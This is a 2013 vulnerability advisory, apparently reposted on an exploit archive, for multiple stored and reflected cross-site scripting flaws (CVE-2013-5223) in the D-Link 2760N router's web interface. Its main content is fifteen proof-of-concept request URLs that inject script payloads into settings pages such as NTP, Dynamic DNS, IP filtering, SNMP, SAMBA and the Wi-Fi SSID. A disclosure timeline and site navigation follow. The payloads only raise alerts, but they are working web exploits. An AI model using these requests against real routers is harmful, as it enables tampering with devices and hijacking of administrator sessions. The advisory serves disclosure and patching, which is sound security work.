D-Link Router 2760N Cross Site Scripting

D-Link Router 2760N Cross Site Scripting: Posted Nov 11, 2013; Authored by Liad Mizrachi; D-Link Router 2760N suffers from multiple persistent and reflective cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; advisories | CVE-2013-5223; SHA-256 | b8e2b669db94522a88b4b3e085a247fb8f045f4cb2f75317224ff4042ac2dda4; Download | Favorite | View

D-Link Router 2760N Cross Site Scripting

Advisory:    D-Link Router 2760N (DSL-2760U-BN) Multiple XSS
Author:    Liad Mizrachi
Vendor URL:  http://www.dlink.com
Status:    Fixed
CVE-ID:    CVE-2013-5223

==========================
Vulnerability Description
==========================

Multiple Cross-Site Scripting (XSS) vulnerabilities present in D-Link Router 2760N, both stored and reflected in various sections of the router Web-UI.


==========================
  PoC
==========================


1) NTS Settings
http://<D_LINK_HOST>/sntpcfg.cgi?ntp_enabled=1&ntpServer1=locahost%22;alert%28%27XSS%27%29;//&ntpServer2=time-nw.nist.gov&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=+02:00&timezone=Jerusalem&use_dst=0



2) Dynamic DNS (Reflected/Stored)
http://<D_LINK_HOST>/ddnsmngr.cmd?action=add&service=1&hostname=aaaa&username=%3cscript%3ealert(%27xss%27)%3c%2fscript%3e&password=zzzzzz&iface=ppp0



3)Parental Control

http://<D_LINK_HOST>/todmngr.tod?action=add&username=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&mac=f1:de:f1:ab:cb:6d&days=1&start_time=571&end_time=732



4) URL Filtering
http://<D_LINK_HOST>/urlfilter.cmd?action=set_url&TodUrlAdd=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&port_num=80



5) NAT - Port Triggering
http://<D_LINK_HOST>/scprttrg.cmd?action=add&appName=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&dstWanIf=ppp0&tStart=1111,&tEnd=1112,&tProto=1,&oStart=11,&oEnd=11,&oProto=1,



6) IP Filtering:
http://<D_LINK_HOST>/scoutflt.cmd?action=add&fltName=<script>alert('XSS')</script>&protocol=1&srcAddr=10.0.0.10&srcMask=255.255.255.0&srcPort=80&dstAddr=10.0.0.12&dstMask=255.255.255.0&dstPort=8080



7) IP Filtering - Removal Error:
http://<D_LINK_HOST>/scoutflt.cmd?action=remove&rmLst=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E



8) Interface Grouping (also reflected on "Local Area Network (LAN) Setup"):
http://<D_LINK_HOST>/portmapcfg.cmd?action=add&groupName=<Script>alert('XSS')</script>&choiceBox=|usb0|wl0|&wanIfName=atm1



9) SNMP
http://<D_LINK_HOST>/snmpconfig.cgi?snmpStatus=1&snmpRoCommunity=%27;alert(%27XSS%27)&snmpRwCommunity=private&snmpSysName=D-LINK&snmpSysContact=unknown&snmpSysLocation=unknown&snmpTrapIp=0.0.0.0



10) Incoming IP Filter:
http://<D_LINK_HOST>/scinflt.cmd?action=add&wanIf=ppp0&fltName=<script>alert('XSS&protocol=2&srcAddr=SS')</script>&srcMask=255.255.255.0&srcPort=80&dstAddr=10.0.0.10&dstMask=255.255.255.0&dstPort=8080



11) Policy Routing Add:
http://<D_LINK_HOST>/prmngr.cmd?action=add&PolicyName=<script>alert('X&SourceIp=SS');</script>&lanIfcName=wl0&wanIf=ppp0&defaultgw=10.0.0.111



12)Policy Routing -Removal Error:
http://<D_LINK_HOST>/prmngr.cmd?action=remove&rmLst=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E



13) Printer Server
http://<D_LINK_HOST>/ippcfg.cmd?action=savapply&ippEnabled=1&ippMake=aa&ippName=aa";alert('XSS-Printer-Sever');//



14) SAMBA Configuration
http://<D_LINK_HOST>/samba.cgi?enableSmb=1&smbNetBiosName=';var x="XSS";//&smbDirName=b';alert(x);//&smbUtf8DirName=bbb&smbCharset=utf8&smbUnplug=nolug=no
OR
http://<D_LINK_HOST>/samba.cgi?enableSmb=1&smbNetBiosName=';alert("SAMBA-X&smbDirName=SS");//&smbUtf8DirName=bbb&smbCharset=utf8&smbUnplug=nolug=no



15) WiFi SSID
Step 1 (Create XSS as Wireless SSID): 
http://<D_LINK_HOST>/wlcfg.wl?wlSsidIdx=0&wlEnbl=1&wlHide=0&wlAPIsolation=0&wlSsid=%3CScript%3Ealert(%27XSSID%27)%3C/script%3E&wlCountry=IL&wlMaxAssoc=16&wlDisableWme=0&wlEnableWmf=0&wlEnbl_wl0v1=0&wlSsid_wl0v1=wl0_Guest1&wlHide_wl0v1=0&wlAPIsolation_wl0v1=0&wlDisableWme_wl0v1=0&wlEnableWmf_wl0v1=0&wlMaxAssoc_wl0v1=16&wlEnbl_wl0v2=0&wlSsid_wl0v2=wl0_Guest2&wlHide_wl0v2=0&wlAPIsolation_wl0v2=0&wlDisableWme_wl0v2=0&wlEnableWmf_wl0v2=0&wlMaxAssoc_wl0v2=16&wlEnbl_wl0v3=0&wlSsid_wl0v3=wl0_Guest3&wlHide_wl0v3=0&wlAPIsolation_wl0v3=0&wlDisableWme_wl0v3=0&wlEnableWmf_wl0v3=0&wlMaxAssoc_wl0v3=16

Step 2: 
Goto the Wireless -> Security [http://<D_LINK_HOST>/wlsecurity.html]
  OR
Goto the Wireless -> MAC Filter [http://<D_LINK_HOST>/wlmacflt.cmd?action=view]




==========================
Disclosure Timeline
==========================


17-Aug-2013 - Vendor Informed - No response.
23-Aug-2013 - Vendor Re-Informed - No response.
01-Sep-2013 - Vendor Re-Informed - No response.
10-Sep-2013 - Vendor Re-Informed - No response.
10-Oct-2013 - Vendor Re-Informed - No response.

==========================
References
==========================


http://www.dlink.com
http://www.dlink.com.tr/en/arts/117.html
http://www.netcheif.com/downloads/DSL-2760U_user_manual.pdf

Top Authors In Last 30 Days

Red Hat 227 files
indoushka 137 files
Ubuntu 72 files
Gentoo 33 files
Debian 28 files
Sebastian Hamann 8 files
Jann Horn 7 files
Jaggar Henry 6 files
Google Security Research 6 files
Moritz Abrell 6 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,112)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,945)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,659)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,783)
UNIX (9,443)
UnixWare (187)
Windows (6,679)
Other

D-Link Router 2760N Cross Site Scripting

D-Link Router 2760N Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

D-Link Router 2760N Cross Site Scripting

Share This

D-Link Router 2760N Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems